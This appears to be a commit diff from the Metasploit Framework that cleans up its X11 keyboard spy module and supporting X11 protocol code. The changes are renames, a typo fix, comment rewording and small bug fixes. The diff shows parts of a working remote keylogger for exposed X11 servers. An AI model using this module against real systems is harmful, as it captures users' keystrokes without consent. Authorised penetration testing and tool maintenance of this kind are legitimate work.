Further updates to x11

documentation/modules/auxiliary/gather/x11_keyboard_spy.md

@@ -126,7 +126,7 @@ msf6 auxiliary(gather/x11_keyboard_spy) > run
 
 [*] 127.0.0.1:6000 - Establishing TCP Connection
 [*] 127.0.0.1:6000 - [1/9] Establishing X11 connection
-[-] 127.0.0.1:6000 - Connection packet malfored (size: 8192), attempting to get read more data
+[-] 127.0.0.1:6000 - Connection packet malformed (size: 8192), attempting to get read more data
 [+] 127.0.0.1:6000 - Successfully established X11 connection
 [*] 127.0.0.1:6000 - Version: 11.0
 [*] 127.0.0.1:6000 - Screen Resolution: 958x832

lib/msf/core/exploit/remote/x11/extension.rb

@@ -16,8 +16,8 @@ def query_extension(extension_name, call_count)
     result = nil
     begin
       packet = sock.timed_read(X11QueryExtensionResponse.new.num_bytes)
-      # leaving here, good for debugging
-      packet.bytes.map { |b| '\\x' + b.to_s(16).rjust(2, '0') }.join
+      # for debugging, print the following line
+      # puts packet.bytes.map { |b| '\\x' + b.to_s(16).rjust(2, '0') }.join
       result = X11QueryExtensionResponse.read(packet)
     rescue StandardError => e
       vprint_bad("Error (#{e}) processing data: #{packet.bytes.map { |b| %(\\x) + b.to_s(16).rjust(2, '0') }.join}")

lib/rex/proto/x11/window.rb

@@ -217,8 +217,8 @@ def initialize(width, height, image_data, color_data)
     @color_data = color_data # from X11GetColorsResponse
   end
 
-  self.from_replies(width, height, image_reply, color_reply)
-    self.new(width, height, image_reply.image_data, color_reply.colors)
+  def self.from_replies(width, height, image_reply, color_reply)
+    new(width, height, image_reply.image_data, color_reply.colors)
   end
 
   def create_image

modules/auxiliary/gather/x11_keyboard_spy.rb

@@ -87,7 +87,7 @@ def build_sym_key_map(map_data)
       if syms.n_syms == 0
         key_map[key_code] = nil
       else
-        sym = map_data.key_map_array[keysym_index].key_sym_array[0].syms
+        sym = map_data.key_map_array[keysym_index].key_sym_array[0]
         begin
           character = sym.chr
           character = '[space]' if character == ' '
@@ -129,7 +129,7 @@ def translate_keystroke(bit_array_of_keystrokes, key_map, last_key_press_array)
   end
 
   def run
-    query_extension_calls = 0
+    query_extension_call_counter = 0
     @keylogger_log = ''
     @keylogger_print_buffer = ''
 
@@ -147,7 +147,7 @@ def run
     end
 
     vprint_status('[2/9] Checking on BIG-REQUESTS extension')
-    big_requests_plugin = query_extension('BIG-REQUESTS', query_extension_calls)
+    big_requests_plugin = query_extension('BIG-REQUESTS', query_extension_call_counter)
     fail_with(Msf::Module::Failure::UnexpectedReply, 'Unable to process response') if big_requests_plugin.nil?
     if big_requests_plugin.present == 1
       print_good("  Extension BIG-REQUESTS is present with id #{big_requests_plugin.major_opcode}")
@@ -173,7 +173,7 @@ def run
     sock.put(gc_header.to_binary_s +
              gc_body.to_binary_s +
              gp_header.to_binary_s +
-             gp_body.to_binary_s) # not sure why we do this
+             gp_body.to_binary_s) # not sure why we also do a get property, but it emulates how the library works
 
     # nothing valuable in the response, just make sure we read it in to
     # confirm its expected data and not leave the response on the socket
@@ -188,7 +188,7 @@ def run
     end
 
     vprint_status('[5/9] Checking on XKEYBOARD extension')
-    xkeyboard_plugin = query_extension('XKEYBOARD', query_extension_calls)
+    xkeyboard_plugin = query_extension('XKEYBOARD', query_extension_call_counter)
     fail_with(Msf::Module::Failure::UnexpectedReply, 'Unable to process response') if xkeyboard_plugin.nil?
     if xkeyboard_plugin.present == 1
       print_good("  Extension XKEYBOARD is present with id #{xkeyboard_plugin.major_opcode}")
@@ -205,24 +205,25 @@ def run
                                   full_key_types: 1,
                                   full_key_syms: 1,
                                   full_modifier_map: 1).to_binary_s)
-    data = sock.get_once(-1, 1)
+    map_raw_data = sock.get_once(-1, 1)
+    # for debugging packet output, uncomment following line
     # puts data.bytes.map { |b| "\\x" + b.to_s(16).rjust(2, '0') }.join
-    map_data = X11GetMapReply.read(data)
+    map_data = X11GetMapReply.read(map_raw_data)
 
     vprint_status('[8/9] Enabling notification on keyboard and map')
     sock.put(X11SelectEvents.new(xkeyboard_id: xkeyboard_plugin.major_opcode,
                                  affect_which_new_keyboard_notify: 1,
                                  affect_new_keyboard_key_codes: 1,
                                  affect_new_keyboard_device_id: 1).to_binary_s +
-                              X11SelectEvents.new(xkeyboard_id: xkeyboard_plugin.major_opcode,
-                                                  affect_which_map_notify: 1,
-                                                  affect_map_key_types: 1,
-                                                  affect_map_key_syms: 1,
-                                                  affect_map_modifier_map: 1,
-                                                  map_key_types: 1,
-                                                  map_key_syms: 1,
-                                                  map_modifier_map: 1).to_binary_s) # not sure what this does
-    sock.get_once(-1, 1)
+             X11SelectEvents.new(xkeyboard_id: xkeyboard_plugin.major_opcode,
+                                 affect_which_map_notify: 1,
+                                 affect_map_key_types: 1,
+                                 affect_map_key_syms: 1,
+                                 affect_map_modifier_map: 1,
+                                 map_key_types: 1,
+                                 map_key_syms: 1,
+                                 map_modifier_map: 1).to_binary_s) # not sure what this does, but emulates x11 c library
+    # this request doesn't receive any response data
 
     vprint_status('[9/9] Creating local keyboard map')
     key_map = build_sym_key_map(map_data)